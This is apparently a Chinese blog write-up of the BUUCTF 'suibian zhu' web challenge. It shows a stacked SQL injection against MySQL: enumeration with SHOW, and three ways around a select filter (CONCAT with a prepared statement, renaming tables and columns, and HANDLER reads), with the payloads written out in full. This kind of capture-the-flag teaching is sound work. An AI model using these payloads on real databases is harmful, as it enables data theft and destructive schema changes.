buuctf web 随便注

这题注入点很好找,跟之前easy sql一样
先1’直接回显,找到注入点
于是常用思路1’ union select 1,2#
把过滤字符都返回出来了
return preg_match("/select|update|delete|drop|insert|where|./i",$inject);
下面就是sql(mysql)知识时间
show语句没有过滤,所以可以开始

-1';show databases; -1';show tables; -1';show columns from `1919810931114514`; 

现在很明显了,我们需要从1919810931114514这个表里拿到flag
于是需要查找select过滤的绕过方式
1

.-1'; Set @sql=CONCAT('se','lect * from `1919810931114514`;'); Prepare stmt from @sql; execute stmt; 

利用concat+预处理机制来绕过select过滤,就是在sql执行的时候才拼接出select,而过滤的时候,过滤函数看到的是se
和lect两个字符串
2.由于alter名又被禁用,所以可以通过更改表的方式来间接绕过

-1'; rename table `words` to `test`; rename table `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100); 

修改后payload:-1’ or ‘1’='1
3.mysql自带handler函数

1'; handler `words` open; handler `words` read first; 

(我之前方法2改过数据库,如果直接用handler函数,那么把words换成1919…)
参考视频链接:https://www.bilibili.com/video/BV1eg411L7BN/

版权声明:玥玥 发表于 2021-08-10 11:08:46。
转载请注明:buuctf web 随便注 | 女黑客导航